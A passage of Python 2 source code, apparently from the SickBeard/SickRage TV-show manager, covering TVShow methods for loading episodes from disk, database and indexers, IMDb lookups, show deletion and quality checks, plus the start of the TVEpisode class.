mediaFile)) except (exceptions.ShowNotFoundException, exceptions.EpisodeNotFoundException), e: logger.log(u"Episode " + mediaFile + " returned an exception: " + ex(e), logger.ERROR) continue except exceptions.EpisodeDeletedException: logger.log(u"The episode 
deleted itself when I tried making an object for it", logger.DEBUG) if curEpisode is None: continue # see if we should save the release name in the db ep_file_name = ek.ek(os.path.basename, curEpisode.location) ep_file_name = ek.ek(os.path.splitext, ep_file_name)[0] try: parse_result = None np = NameParser(False, showObj=self, tryIndexers=True) parse_result = np.parse(ep_file_name) except (InvalidNameException, InvalidShowException): pass if not ' ' in ep_file_name and parse_result and parse_result.release_group: logger.log( u"Name " + ep_file_name + u" gave release group of " + parse_result.release_group + ", seems valid", logger.DEBUG) curEpisode.release_name = ep_file_name # store the reference in the show if curEpisode != None: if self.subtitles: try: curEpisode.refreshSubtitles() except: logger.log("%s: Could not refresh subtitles" % self.indexerid, logger.ERROR) logger.log(traceback.format_exc(), logger.DEBUG) sql_l.append(curEpisode.get_sql()) if sql_l: myDB = db.DBConnection() myDB.mass_action(sql_l) def loadEpisodesFromDB(self): logger.log(u"Loading all episodes from the DB", logger.DEBUG) myDB = db.DBConnection() sql = "SELECT * FROM tv_episodes WHERE showid = ?" sqlResults = myDB.select(sql, [self.indexerid]) scannedEps = {} lINDEXER_API_PARMS = sickbeard.indexerApi(self.indexer).api_params.copy() if self.lang: lINDEXER_API_PARMS['language'] = self.lang logger.log(u"Using language: " + str(self.lang), logger.DEBUG) if self.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True logger.log(u"lINDEXER_API_PARMS: " + str(lINDEXER_API_PARMS), logger.DEBUG) t = sickbeard.indexerApi(self.indexer).indexer(**lINDEXER_API_PARMS) cachedShow = t[self.indexerid] cachedSeasons = {} for curResult in sqlResults: logger.log(u"loadEpisodesFromDB curResult: " + str(curResult), logger.DEBUG) deleteEp = False curSeason = int(curResult["season"]) curEpisode = int(curResult["episode"]) if curSeason not in cachedSeasons: try: cachedSeasons[curSeason] = cachedShow[curSeason] except sickbeard.indexer_seasonnotfound, e: logger.log(u"Error when trying to load the episode from " + sickbeard.indexerApi( self.indexer).name + ": " + e.message, logger.WARNING) deleteEp = True if not curSeason in scannedEps: logger.log(u"Not curSeason in scannedEps", logger.DEBUG) scannedEps[curSeason] = {} logger.log(u"Loading episode S%02dE%02d from the DB" % (curSeason, curEpisode), logger.DEBUG) try: curEp = self.getEpisode(curSeason, curEpisode) if not curEp: raise exceptions.EpisodeNotFoundException # if we found out that the ep is no longer on TVDB then delete it from our database too if deleteEp: curEp.deleteEpisode() curEp.loadFromDB(curSeason, curEpisode) curEp.loadFromIndexer(tvapi=t, cachedSeason=cachedSeasons[curSeason]) scannedEps[curSeason][curEpisode] = True except exceptions.EpisodeDeletedException: logger.log(u"Tried loading an episode from the DB that should have been deleted, skipping it", logger.DEBUG) continue logger.log(u"Finished loading all episodes from the DB", logger.DEBUG) return scannedEps def loadEpisodesFromIndexer(self, cache=True): lINDEXER_API_PARMS = sickbeard.indexerApi(self.indexer).api_params.copy() if not cache: lINDEXER_API_PARMS['cache'] = False if self.lang: lINDEXER_API_PARMS['language'] = self.lang if self.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True try: t = sickbeard.indexerApi(self.indexer).indexer(**lINDEXER_API_PARMS) showObj = t[self.indexerid] except sickbeard.indexer_error: logger.log(u"" + sickbeard.indexerApi( self.indexer).name + " timed out, unable to update episodes 
from " + sickbeard.indexerApi( self.indexer).name, logger.WARNING) return None logger.log( str(self.indexerid) + u": Loading all episodes from " + sickbeard.indexerApi(self.indexer).name + "..", logger.DEBUG) scannedEps = {} sql_l = [] for season in showObj: scannedEps[season] = {} for episode in showObj[season]: # need some examples of wtf episode 0 means to decide if we want it or not if episode == 0: continue try: ep = self.getEpisode(season, episode) if not ep: raise exceptions.EpisodeNotFoundException except exceptions.EpisodeNotFoundException: logger.log("%s: %s object for S%02dE%02d is incomplete, skipping this episode" % (self.indexerid, sickbeard.indexerApi(self.indexer).name, season, episode)) continue else: try: ep.loadFromIndexer(tvapi=t) except exceptions.EpisodeDeletedException: logger.log(u"The episode was deleted, skipping the rest of the load") continue with ep.lock: logger.log("%s: Loading info from %s for episode S%02dE%02d" % (self.indexerid, sickbeard.indexerApi(self.indexer).name, season, episode),logger.DEBUG) ep.loadFromIndexer(season, episode, tvapi=t) sql_l.append(ep.get_sql()) scannedEps[season][episode] = True if len(sql_l) > 0: myDB = db.DBConnection() myDB.mass_action(sql_l) # Done updating save last update date self.last_update_indexer = datetime.date.today().toordinal() self.saveToDB() return scannedEps def getImages(self, fanart=None, poster=None): fanart_result = poster_result = banner_result = False season_posters_result = season_banners_result = season_all_poster_result = season_all_banner_result = False for cur_provider in sickbeard.metadata_provider_dict.values(): # FIXME: Needs to not show this message if the option is not enabled? logger.log(u"Running metadata routines for " + cur_provider.name, logger.DEBUG) fanart_result = cur_provider.create_fanart(self) or fanart_result poster_result = cur_provider.create_poster(self) or poster_result banner_result = cur_provider.create_banner(self) or banner_result season_posters_result = cur_provider.create_season_posters(self) or season_posters_result season_banners_result = cur_provider.create_season_banners(self) or season_banners_result season_all_poster_result = cur_provider.create_season_all_poster(self) or season_all_poster_result season_all_banner_result = cur_provider.create_season_all_banner(self) or season_all_banner_result return fanart_result or poster_result or banner_result or season_posters_result or season_banners_result or season_all_poster_result or season_all_banner_result # make a TVEpisode object from a media file def makeEpFromFile(self, file): if not ek.ek(os.path.isfile, file): logger.log(str(self.indexerid) + u": That isn't even a real file dude... 
" + file) return None logger.log(str(self.indexerid) + u": Creating episode object from " + file, logger.DEBUG) try: myParser = NameParser(showObj=self, tryIndexers=True) parse_result = myParser.parse(file) except InvalidNameException: logger.log(u"Unable to parse the filename " + file + " into a valid episode", logger.DEBUG) return None except InvalidShowException: logger.log(u"Unable to parse the filename " + file + " into a valid show", logger.DEBUG) return None if not len(parse_result.episode_numbers): logger.log("parse_result: " + str(parse_result)) logger.log(u"No episode number found in " + file + ", ignoring it", logger.WARNING) return None # for now lets assume that any episode in the show dir belongs to that show season = parse_result.season_number if parse_result.season_number != None else 1 episodes = parse_result.episode_numbers rootEp = None sql_l = [] for curEpNum in episodes: episode = int(curEpNum) logger.log("%s: %s parsed to %s S%02dE%02d" % (self.indexerid, file, self.name, season, episode), logger.DEBUG) checkQualityAgain = False same_file = False curEp = self.getEpisode(season, episode) if not curEp: try: curEp = self.getEpisode(season, episode, file) if not curEp: raise exceptions.EpisodeNotFoundException except exceptions.EpisodeNotFoundException: logger.log(str(self.indexerid) + u": Unable to figure out what this file is, skipping", logger.ERROR) continue else: # if there is a new file associated with this ep then re-check the quality if curEp.location and ek.ek(os.path.normpath, curEp.location) != ek.ek(os.path.normpath, file): logger.log( u"The old episode had a different file associated with it, I will re-check the quality based on the new filename " + file, logger.DEBUG) checkQualityAgain = True with curEp.lock: old_size = curEp.file_size curEp.location = file # if the sizes are the same then it's probably the same file if old_size and curEp.file_size == old_size: same_file = True else: same_file = False curEp.checkForMetaFiles() if rootEp == None: rootEp = curEp else: if curEp not in rootEp.relatedEps: with rootEp.lock: rootEp.relatedEps.append(curEp) # if it's a new file then if not same_file: with curEp.lock: curEp.release_name = '' # if they replace a file on me I'll make some attempt at re-checking the quality unless I know it's the same file if checkQualityAgain and not same_file: newQuality = Quality.nameQuality(file, self.is_anime) logger.log(u"Since this file has been renamed, I checked " + file + " and found quality " + Quality.qualityStrings[newQuality], logger.DEBUG) if newQuality != Quality.UNKNOWN: with curEp.lock: curEp.status = Quality.compositeStatus(DOWNLOADED, newQuality) # check for status/quality changes as long as it's a new file elif not same_file and sickbeard.helpers.isMediaFile(file) and curEp.status not in Quality.DOWNLOADED + [ ARCHIVED, IGNORED]: oldStatus, oldQuality = Quality.splitCompositeStatus(curEp.status) newQuality = Quality.nameQuality(file, self.is_anime) if newQuality == Quality.UNKNOWN: newQuality = Quality.assumeQuality(file) newStatus = None # if it was snatched and now exists then set the status correctly if oldStatus == SNATCHED and oldQuality <= newQuality: logger.log(u"STATUS: this ep used to be snatched with quality " + Quality.qualityStrings[ oldQuality] + u" but a file exists with quality " + Quality.qualityStrings[ newQuality] + u" so I'm setting the status to DOWNLOADED", logger.DEBUG) newStatus = DOWNLOADED # if it was snatched proper and we found a higher quality one then allow the status change elif 
oldStatus == SNATCHED_PROPER and oldQuality < newQuality: logger.log(u"STATUS: this ep used to be snatched proper with quality " + Quality.qualityStrings[ oldQuality] + u" but a file exists with quality " + Quality.qualityStrings[ newQuality] + u" so I'm setting the status to DOWNLOADED", logger.DEBUG) newStatus = DOWNLOADED elif oldStatus not in (SNATCHED, SNATCHED_PROPER): newStatus = DOWNLOADED if newStatus is not None: with curEp.lock: logger.log(u"STATUS: we have an associated file, so setting the status from " + str( curEp.status) + u" to DOWNLOADED/" + str(Quality.statusFromName(file, anime=self.is_anime)), logger.DEBUG) curEp.status = Quality.compositeStatus(newStatus, newQuality) with curEp.lock: sql_l.append(curEp.get_sql()) if len(sql_l) > 0: myDB = db.DBConnection() myDB.mass_action(sql_l) # creating metafiles on the root should be good enough if rootEp: with rootEp.lock: rootEp.createMetaFiles() return rootEp def loadFromDB(self, skipNFO=False): logger.log(str(self.indexerid) + u": Loading show info from database", logger.DEBUG) myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM tv_shows WHERE indexer_id = ?", [self.indexerid]) if len(sqlResults) > 1: raise exceptions.MultipleDBShowsException() elif len(sqlResults) == 0: logger.log(str(self.indexerid) + ": Unable to find the show in the database") return else: self.indexer = int(sqlResults[0]["indexer"] or 0) if not self.name: self.name = sqlResults[0]["show_name"] if not self.network: self.network = sqlResults[0]["network"] if not self.genre: self.genre = sqlResults[0]["genre"] if not self.classification: self.classification = sqlResults[0]["classification"] self.runtime = sqlResults[0]["runtime"] self.status = sqlResults[0]["status"] if self.status is None: self.status = "Unknown" self.airs = sqlResults[0]["airs"] if self.airs is None: self.airs = "" self.startyear = int(sqlResults[0]["startyear"] or 0) self.air_by_date = int(sqlResults[0]["air_by_date"] or 0) self.anime = int(sqlResults[0]["anime"] or 0) self.sports = int(sqlResults[0]["sports"] or 0) self.scene = int(sqlResults[0]["scene"] or 0) self.subtitles = int(sqlResults[0]["subtitles"] or 0) self.dvdorder = int(sqlResults[0]["dvdorder"] or 0) self.archive_firstmatch = int(sqlResults[0]["archive_firstmatch"] or 0) self.quality = int(sqlResults[0]["quality"] or UNKNOWN) self.flatten_folders = int(sqlResults[0]["flatten_folders"] or 0) self.paused = int(sqlResults[0]["paused"] or 0) try: self.location = sqlResults[0]["location"] except Exception: dirty_setter("_location")(self, sqlResults[0]["location"]) self._isDirGood = False if not self.lang: self.lang = sqlResults[0]["lang"] self.last_update_indexer = sqlResults[0]["last_update_indexer"] self.rls_ignore_words = sqlResults[0]["rls_ignore_words"] self.rls_require_words = sqlResults[0]["rls_require_words"] self.default_ep_status = int(sqlResults[0]["default_ep_status"] or SKIPPED) if not self.imdbid: self.imdbid = sqlResults[0]["imdb_id"] if self.is_anime: self.release_groups = BlackAndWhiteList(self.indexerid) # Get IMDb_info from database myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM imdb_info WHERE indexer_id = ?", [self.indexerid]) if len(sqlResults) == 0: logger.log(str(self.indexerid) + ": Unable to find IMDb show info in the database") return else: self.imdb_info = dict(zip(sqlResults[0].keys(), sqlResults[0])) self.dirty = False return True def loadFromIndexer(self, cache=True, tvapi=None, cachedSeason=None): if self.indexer is not INDEXER_TVRAGE: logger.log(str(self.indexerid) 
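# --- Editor's annotation (not part of the original tv.py sample) ---
# loadFromDB above coerces nullable columns with int(row["col"] or 0),
# so a NULL falls back to a default instead of raising TypeError. A tiny
# stdlib illustration of the idiom:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.row_factory = sqlite3.Row
conn.execute("CREATE TABLE tv_shows (indexer_id INTEGER, paused INTEGER)")
conn.execute("INSERT INTO tv_shows VALUES (1, NULL)")
row = conn.execute("SELECT * FROM tv_shows WHERE indexer_id = ?", (1,)).fetchone()

paused = int(row["paused"] or 0)   # NULL -> None -> 0, not a TypeError
assert paused == 0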
+ u": Loading show info from " + sickbeard.indexerApi(self.indexer).name, logger.DEBUG) # There's gotta be a better way of doing this but we don't wanna # change the cache value elsewhere if tvapi is None: lINDEXER_API_PARMS = sickbeard.indexerApi(self.indexer).api_params.copy() if not cache: lINDEXER_API_PARMS['cache'] = False if self.lang: lINDEXER_API_PARMS['language'] = self.lang if self.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True t = sickbeard.indexerApi(self.indexer).indexer(**lINDEXER_API_PARMS) else: t = tvapi myEp = t[self.indexerid] try: self.name = myEp['seriesname'].strip() except AttributeError: raise sickbeard.indexer_attributenotfound( "Found %s, but attribute 'seriesname' was empty." % (self.indexerid)) self.classification = getattr(myEp, 'classification', 'Scripted') self.genre = getattr(myEp, 'genre', '') self.network = getattr(myEp, 'network', '') self.runtime = getattr(myEp, 'runtime', '') self.imdbid = getattr(myEp, 'imdb_id', '') if getattr(myEp, 'airs_dayofweek', None) is not None and getattr(myEp, 'airs_time', None) is not None: self.airs = myEp["airs_dayofweek"] + " " + myEp["airs_time"] if self.airs is None: self.airs = '' if getattr(myEp, 'firstaired', None) is not None: self.startyear = int(str(myEp["firstaired"]).split('-')[0]) self.status = getattr(myEp, 'status', 'Unknown') else: logger.log(str(self.indexerid) + u": NOT loading info from " + sickbeard.indexerApi(self.indexer).name + " as it is temporarily disabled.", logger.WARNING) def loadIMDbInfo(self, imdbapi=None): imdb_info = {'imdb_id': self.imdbid, 'title': '', 'year': '', 'akas': [], 'runtimes': '', 'genres': [], 'countries': '', 'country_codes': [], 'certificates': [], 'rating': '', 'votes': '', 'last_update': '' } i = imdb.IMDb() if not self.imdbid: self.imdbid = i.title2imdbID(self.name, kind='tv series') if self.imdbid: logger.log(str(self.indexerid) + u": Loading show info from IMDb", logger.DEBUG) imdbTv = i.get_movie(str(re.sub("[^0-9]", "", self.imdbid))) for key in filter(lambda x: x.replace('_', ' ') in imdbTv.keys(), imdb_info.keys()): # Store only the first value for string type if type(imdb_info[key]) == type('') and type(imdbTv.get(key)) == type([]): imdb_info[key] = imdbTv.get(key.replace('_', ' '))[0] else: imdb_info[key] = imdbTv.get(key.replace('_', ' ')) # Filter only the value if imdb_info['runtimes']: imdb_info['runtimes'] = re.search('\d+', imdb_info['runtimes']).group(0) else: imdb_info['runtimes'] = self.runtime if imdb_info['akas']: imdb_info['akas'] = '|'.join(imdb_info['akas']) else: imdb_info['akas'] = '' # Join all genres in a string if imdb_info['genres']: imdb_info['genres'] = '|'.join(imdb_info['genres']) else: imdb_info['genres'] = '' # Get only the production country certificate if any if imdb_info['certificates'] and imdb_info['countries']: dct = {} try: for item in imdb_info['certificates']: dct[item.split(':')[0]] = item.split(':')[1] imdb_info['certificates'] = dct[imdb_info['countries']] except: imdb_info['certificates'] = '' else: imdb_info['certificates'] = '' if imdb_info['country_codes']: imdb_info['country_codes'] = '|'.join(imdb_info['country_codes']) else: imdb_info['country_codes'] = '' imdb_info['last_update'] = datetime.date.today().toordinal() # Rename dict keys without spaces for DB upsert self.imdb_info = dict( (k.replace(' ', '_'), k(v) if hasattr(v, 'keys') else v) for k, v in imdb_info.iteritems()) logger.log(str(self.indexerid) + u": Obtained info from IMDb ->" + str(self.imdb_info), logger.DEBUG) def nextEpisode(self): 
logger.log(str(self.indexerid) + ": Finding the episode which airs next", logger.DEBUG) curDate = datetime.date.today().toordinal() if not self.nextaired or self.nextaired and curDate > self.nextaired: myDB = db.DBConnection() sqlResults = myDB.select( "SELECT airdate, season, episode FROM tv_episodes WHERE showid = ? AND airdate >= ? AND status IN (?,?) ORDER BY airdate ASC LIMIT 1", [self.indexerid, datetime.date.today().toordinal(), UNAIRED, WANTED]) if sqlResults == None or len(sqlResults) == 0: logger.log(str(self.indexerid) + u": No episode found... need to implement a show status", logger.DEBUG) self.nextaired = "" else: logger.log(u"%s: Found episode S%02dE%02d" % (self.indexerid, sqlResults[0]["season"], sqlResults[0]["episode"] ) , logger.DEBUG) self.nextaired = sqlResults[0]['airdate'] return self.nextaired def deleteShow(self, full=False): sql_l = [["DELETE FROM tv_episodes WHERE showid = ?", [self.indexerid]], ["DELETE FROM tv_shows WHERE indexer_id = ?", [self.indexerid]], ["DELETE FROM imdb_info WHERE indexer_id = ?", [self.indexerid]], ["DELETE FROM xem_refresh WHERE indexer_id = ?", [self.indexerid]], ["DELETE FROM scene_numbering WHERE indexer_id = ?", [self.indexerid]]] myDB = db.DBConnection() myDB.mass_action(sql_l) action = ('delete', 'trash')[sickbeard.TRASH_REMOVE_SHOW] # remove self from show list sickbeard.showList = [x for x in sickbeard.showList if int(x.indexerid) != self.indexerid] # clear the cache image_cache_dir = ek.ek(os.path.join, sickbeard.CACHE_DIR, 'images') for cache_file in ek.ek(glob.glob, ek.ek(os.path.join, image_cache_dir, str(self.indexerid) + '.*')): logger.log(u'Attempt to %s cache file %s' % (action, cache_file)) try: if sickbeard.TRASH_REMOVE_SHOW: send2trash(cache_file) else: os.remove(cache_file) except OSError, e: logger.log(u'Unable to %s %s: %s / %s' % (action, cache_file, repr(e), str(e)), logger.WARNING) # remove entire show folder if full: try: logger.log(u'Attempt to %s show folder %s' % (action, self._location)) # check first the read-only attribute file_attribute = ek.ek(os.stat, self.location)[0] if (not file_attribute & stat.S_IWRITE): # File is read-only, so make it writeable logger.log('Attempting to make writeable the read only folder %s' % self._location, logger.DEBUG) try: ek.ek(os.chmod, self.location, stat.S_IWRITE) except: logger.log(u'Unable to change permissions of %s' % self._location, logger.WARNING) if sickbeard.TRASH_REMOVE_SHOW: send2trash(self.location) else: ek.ek(shutil.rmtree, self.location) logger.log(u'%s show folder %s' % (('Deleted', 'Trashed')[sickbeard.TRASH_REMOVE_SHOW], self._location)) except exceptions.ShowDirNotFoundException: logger.log(u"Show folder does not exist, no need to %s %s" % (action, self._location), logger.WARNING) except OSError, e: logger.log(u'Unable to %s %s: %s / %s' % (action, self._location, repr(e), str(e)), logger.WARNING) if sickbeard.USE_TRAKT and sickbeard.TRAKT_SYNC_WATCHLIST: logger.log(u"Removing show: indexerid " + str(self.indexerid) + ", Title " + str(self.name) + " from Watchlist", logger.DEBUG) notifiers.trakt_notifier.update_watchlist(self, update="remove") def populateCache(self): cache_inst = image_cache.ImageCache() logger.log(u"Checking & filling cache for show " + self.name, logger.DEBUG) cache_inst.fill_cache(self) def refreshDir(self): # make sure the show dir is where we think it is unless dirs are created on the fly if not ek.ek(os.path.isdir, self._location) and not sickbeard.CREATE_MISSING_SHOW_DIRS: return False # load from dir 
self.loadEpisodesFromDir() # run through all locations from DB, check that they exist logger.log(str(self.indexerid) + u": Loading all episodes with a location from the database", logger.DEBUG) myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND location != ''", [self.indexerid]) sql_l = [] for ep in sqlResults: curLoc = os.path.normpath(ep["location"]) season = int(ep["season"]) episode = int(ep["episode"]) try: curEp = self.getEpisode(season, episode) if not curEp: raise exceptions.EpisodeDeletedException except exceptions.EpisodeDeletedException: logger.log(u"The episode was deleted while we were refreshing it, moving on to the next one", logger.DEBUG) continue # if the path doesn't exist or if it's not in our show dir if not ek.ek(os.path.isfile, curLoc) or not os.path.normpath(curLoc).startswith( os.path.normpath(self.location)): # check if downloaded files still exist, update our data if this has changed if not sickbeard.SKIP_REMOVED_FILES: with curEp.lock: # if it used to have a file associated with it and it doesn't anymore then set it to sickbeard.EP_DEFAULT_DELETED_STATUS if curEp.location and curEp.status in Quality.DOWNLOADED: logger.log(u"%s: Location for S%02dE%02d doesn't exist, removing it and changing our status to %s" % (self.indexerid, season, episode, statusStrings[sickbeard.EP_DEFAULT_DELETED_STATUS]) ,logger.DEBUG) curEp.status = sickbeard.EP_DEFAULT_DELETED_STATUS curEp.subtitles = list() curEp.subtitles_searchcount = 0 curEp.subtitles_lastsearch = str(datetime.datetime.min) curEp.location = '' curEp.hasnfo = False curEp.hastbn = False curEp.release_name = '' sql_l.append(curEp.get_sql()) else: # the file exists, set its modify file stamp if sickbeard.AIRDATE_EPISODES: with curEp.lock: curEp.airdateModifyStamp() if sql_l: myDB = db.DBConnection() myDB.mass_action(sql_l) def downloadSubtitles(self, force=False): # TODO: Add support for force option if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + ": Show dir doesn't exist, can't download subtitles", logger.DEBUG) return logger.log("%s: Downloading subtitles" % self.indexerid, logger.DEBUG) try: episodes = self.getAllEpisodes(has_location=True) if not episodes: logger.log("%s: No episodes to download subtitles for %s" % (self.indexerid, self.name), logger.DEBUG) return for episode in episodes: episode.downloadSubtitles(force=force) except Exception: logger.log("%s: Error occurred when downloading subtitles for %s" % (self.indexerid, self.name), logger.DEBUG) logger.log(traceback.format_exc(), logger.ERROR) def saveToDB(self, forceSave=False): if not self.dirty and not forceSave: logger.log(str(self.indexerid) + ": Not saving show to db - record is not dirty", logger.DEBUG) return logger.log(str(self.indexerid) + u": Saving show info to database", logger.DEBUG) controlValueDict = {"indexer_id": self.indexerid} newValueDict = {"indexer": self.indexer, "show_name": self.name, "location": self._location, "network": self.network, "genre": self.genre, "classification": self.classification, "runtime": self.runtime, "quality": self.quality, "airs": self.airs, "status": self.status, "flatten_folders": self.flatten_folders, "paused": self.paused, "air_by_date": self.air_by_date, "anime": self.anime, "scene": self.scene, "sports": self.sports, "subtitles": self.subtitles, "dvdorder": self.dvdorder, "archive_firstmatch": self.archive_firstmatch, "startyear": self.startyear, "lang": self.lang, "imdb_id": self.imdbid, "last_update_indexer": 
self.last_update_indexer, "rls_ignore_words": self.rls_ignore_words, "rls_require_words": self.rls_require_words, "default_ep_status": self.default_ep_status } myDB = db.DBConnection() myDB.upsert("tv_shows", newValueDict, controlValueDict) helpers.update_anime_support() if self.imdbid: controlValueDict = {"indexer_id": self.indexerid} newValueDict = self.imdb_info myDB = db.DBConnection() myDB.upsert("imdb_info", newValueDict, controlValueDict) def __str__(self): toReturn = "" toReturn += "indexerid: " + str(self.indexerid) + "\n" toReturn += "indexer: " + str(self.indexer) + "\n" toReturn += "name: " + self.name + "\n" toReturn += "location: " + self._location + "\n" if self.network: toReturn += "network: " + self.network + "\n" if self.airs: toReturn += "airs: " + self.airs + "\n" toReturn += "status: " + self.status + "\n" toReturn += "startyear: " + str(self.startyear) + "\n" if self.genre: toReturn += "genre: " + self.genre + "\n" toReturn += "classification: " + self.classification + "\n" toReturn += "runtime: " + str(self.runtime) + "\n" toReturn += "quality: " + str(self.quality) + "\n" toReturn += "scene: " + str(self.is_scene) + "\n" toReturn += "sports: " + str(self.is_sports) + "\n" toReturn += "anime: " + str(self.is_anime) + "\n" return toReturn def qualitiesToString(self, qualities=[]): result = u'' for quality in qualities: if Quality.qualityStrings.has_key(quality): result += Quality.qualityStrings[quality] + u', ' else: logger.log(u"Bad quality value: " + str(quality)) result = re.sub(', $', '', result) if not len(result): result = u'None' return result def wantEpisode(self, season, episode, quality, manualSearch=False, downCurQuality=False): logger.log(u"Checking if found episode %s S%02dE%02d is wanted at quality %s" % (self.name, season, episode, Quality.qualityStrings[quality]) , logger.DEBUG) # if the quality isn't one we want under any circumstances then just say no anyQualities, bestQualities = Quality.splitQuality(self.quality) logger.log(u"Any,Best = [ %s ] [ %s ] Found = [ %s ]" % (self.qualitiesToString(anyQualities), self.qualitiesToString(bestQualities), self.qualitiesToString([quality])), logger.DEBUG) if quality not in anyQualities + bestQualities: logger.log(u"Don't want this quality, ignoring found episode", logger.DEBUG) return False myDB = db.DBConnection() sqlResults = myDB.select("SELECT status FROM tv_episodes WHERE showid = ? AND season = ? 
AND episode = ?", [self.indexerid, season, episode]) if not sqlResults or not len(sqlResults): logger.log(u"Unable to find a matching episode in database, ignoring found episode", logger.DEBUG) return False epStatus = int(sqlResults[0]["status"]) epStatus_text = statusStrings[epStatus] logger.log(u"Existing episode status: " + str(epStatus) + " (" + epStatus_text + ")", logger.DEBUG) # if we know we don't want it then just say no if epStatus in (UNAIRED, SKIPPED, IGNORED, ARCHIVED) and not manualSearch: logger.log(u"Existing episode status is unaired/skipped/ignored/archived, ignoring found episode", logger.DEBUG) return False curStatus, curQuality = Quality.splitCompositeStatus(epStatus) # if it's one of these then we want it as long as it's in our allowed initial qualities if quality in anyQualities + bestQualities: if epStatus in (WANTED, SKIPPED): logger.log(u"Existing episode status is wanted or skipped, getting found episode", logger.DEBUG) return True elif manualSearch: if (downCurQuality and quality >= curQuality) or (not downCurQuality and quality > curQuality): logger.log( u"Usually ignoring found episode, but forced search allows the quality, getting found episode", logger.DEBUG) return True else: logger.log(u"Quality is on wanted list, need to check if it's better than existing quality", logger.DEBUG) # if we are re-downloading then we only want it if it's in our bestQualities list and better than what we have, or we only have one bestQuality and we do not have that quality yet if curStatus in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER and quality in bestQualities and (quality > curQuality or curQuality not in bestQualities): logger.log(u"Episode already exists but the found episode quality is wanted more, getting found episode", logger.DEBUG) return True elif curStatus == Quality.UNKNOWN and manualSearch: logger.log(u"Episode already exists but quality is Unknown, getting found episode", logger.DEBUG) return True else: logger.log(u"Episode already exists and the found episode has same/lower quality, ignoring found episode", logger.DEBUG) logger.log(u"None of the conditions were met, ignoring found episode", logger.DEBUG) return False def getOverview(self, epStatus): if epStatus == WANTED: return Overview.WANTED elif epStatus in (UNAIRED, UNKNOWN): return Overview.UNAIRED elif epStatus in (SKIPPED, IGNORED): return Overview.SKIPPED elif epStatus == ARCHIVED: return Overview.GOOD elif epStatus in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.FAILED + Quality.SNATCHED_BEST + Quality.ARCHIVED: anyQualities, bestQualities = Quality.splitQuality(self.quality) # @UnusedVariable if bestQualities: maxBestQuality = max(bestQualities) minBestQuality = min(bestQualities) else: maxBestQuality = None minBestQuality = None epStatus, curQuality = Quality.splitCompositeStatus(epStatus) if epStatus == FAILED: return Overview.WANTED if epStatus == DOWNLOADED and curQuality == Quality.UNKNOWN: return Overview.QUAL elif epStatus in (SNATCHED, SNATCHED_PROPER, SNATCHED_BEST): return Overview.SNATCHED # if they don't want re-downloads then we call it good if they have anything elif maxBestQuality == None: return Overview.GOOD # if the want only first match and already have one call it good elif self.archive_firstmatch and curQuality in bestQualities: return Overview.GOOD # if they want only first match and current quality is higher than minimal best quality call it good elif self.archive_firstmatch and minBestQuality != None and curQuality > 
minBestQuality: return Overview.GOOD # if they have one but it's not the best they want then mark it as qual elif curQuality < maxBestQuality: return Overview.QUAL # if it's >= maxBestQuality then it's good else: return Overview.GOOD def __getstate__(self): d = dict(self.__dict__) del d['lock'] return d def __setstate__(self, d): d['lock'] = threading.Lock() self.__dict__.update(d) class TVEpisode(object): def __init__(self, show, season, episode, file=""): self._name = "" self._season = season self._episode = episode self._absolute_number = 0 self._description = "" self._subtitles = list() self._subtitles_searchcount = 0 self._subtitles_lastsearch = str(datetime.datetime.min) self._airdate = datetime.date.fromordinal(1) self._hasnfo = False self._hastbn = False self._status = UNKNOWN self._indexerid = 0 self._file_size = 0 self._release_name = '' self._is_proper = False self._version = 0 self._release_group = '' # setting any of the above sets the dirty flag self.dirty = True self.show = show self.scene_season = 0 self.scene_episode = 0 self.scene_absolute_number = 0 self._location = file self._indexer = int(self.show.indexer) self.lock = threading.Lock() self.specifyEpisode(self.season, self.episode) self.relatedEps = [] self.checkForMetaFiles() self.wantedQuality = [] name = property(lambda self: self._name, dirty_setter("_name")) season = property(lambda self: self._season, dirty_setter("_season")) episode = property(lambda self: self._episode, dirty_setter("_episode")) absolute_number = property(lambda self: self._absolute_number, dirty_setter("_absolute_number")) description = property(lambda self: self._description, dirty_setter("_description")) subtitles = property(lambda self: self._subtitles, dirty_setter("_subtitles")) subtitles_searchcount = property(lambda self: self._subtitles_searchcount, dirty_setter("_subtitles_searchcount")) subtitles_lastsearch = property(lambda self: self._subtitles_lastsearch, dirty_setter("_subtitles_lastsearch")) airdate = property(lambda self: self._airdate, dirty_setter("_airdate")) hasnfo = property(lambda self: self._hasnfo, dirty_setter("_hasnfo")) hastbn = property(lambda self: self._hastbn, dirty_setter("_hastbn")) status = property(lambda self: self._status, dirty_setter("_status")) indexer = property(lambda self: self._indexer, dirty_setter("_indexer")) indexerid = property(lambda self: self._indexerid, dirty_setter("_indexerid")) # location = property(lambda self: self._location, dirty_setter("_location")) file_size = property(lambda self: self._file_size, dirty_setter("_file_size")) release_name = property(lambda self: self._release_name, dirty_setter("_release_name")) is_proper = property(lambda self: self._is_proper, dirty_setter("_is_proper")) version = property(lambda self: self._version, dirty_setter("_version")) release_group = property(lambda self: self._release_group, dirty_setter("_release_group")) def _set_location(self, new_location): logger.log(u"Setter sets location to " + new_location, logger.DEBUG) # self._location = newLocation dirty_setter("_location")(self, new_location) if new_location and ek.ek(os.path.isfile, new_location): self.file_size = ek.ek(os.path.getsize, new_location) else: self.file_size = 0 location = property(lambda self: self._location, _set_location) def refreshSubtitles(self): """Look for subtitles files and refresh the subtitles property""" self.subtitles = subtitles.subtitlesLanguages(self.location) def downloadSubtitles(self, force=False): if not ek.ek(os.path.isfile, self.location): logger.log(u"%s: 
